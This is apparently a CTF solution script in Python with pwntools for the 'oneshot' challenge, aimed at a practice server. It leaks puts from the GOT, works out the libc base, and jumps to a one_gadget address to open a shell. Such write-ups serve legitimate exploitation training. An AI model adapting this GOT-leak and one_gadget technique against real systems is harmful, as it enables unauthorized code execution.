oneshot_tjctf_2016

exp

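from pwn import *

#context.log_level ='debug'

# Challenge binary plus the libc build the remote service is linked against;
# both are needed to turn one leaked pointer into a libc load base.
elf = ELF('./oneshot_tjctf_2016')
#io = process('./oneshot_tjctf_2016')
io = remote('node3.buuoj.cn','26930')
puts_got = elf.got['puts']
libc = ELF('./libc/libc-2.23.so')

# Candidate one_gadget offsets; only the first one is used below.  Such
# offsets are specific to the exact libc binary (here ./libc/libc-2.23.so),
# so a different libc build needs a different list.
one_gadget = [0x45216,0x4526a,0xf02a4,0xf1147]

# Step 1: the service offers a single read from a caller-chosen address.
# Ask for puts@GOT, which (once puts has been resolved) contains the
# runtime address of puts inside libc.
io.sendlineafter('Read location?',str(puts_got))
# The leaked value appears to be printed zero-padded; skip the fixed
# '0x0000' prefix and parse the remaining hex digits up to the newline.
# (The original had a literal line break inside this string, which is a
# syntax error; it is meant to be the newline escape.)
io.recvuntil('0x0000')
puts_addr = int(io.recvuntil('\n'),16)

print('puts_addr' + hex(puts_addr))
# Leaked runtime address minus the symbol's static offset gives the ASLR
# slide, i.e. the libc load base.
libcbase = puts_addr - libc.symbols['puts']
onegadget = libcbase + one_gadget[0]

# Step 2: send the computed address as the answer to the second prompt;
# that prompt's text is not read here, so the value is sent directly.
# NOTE(review): presumably this is the address the binary jumps to — the
# prompt itself is not visible in this script.
io.sendline(str(onegadget))

io.interactive()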

原文地址:https://www.cnblogs.com/luoleqi/p/13432762.html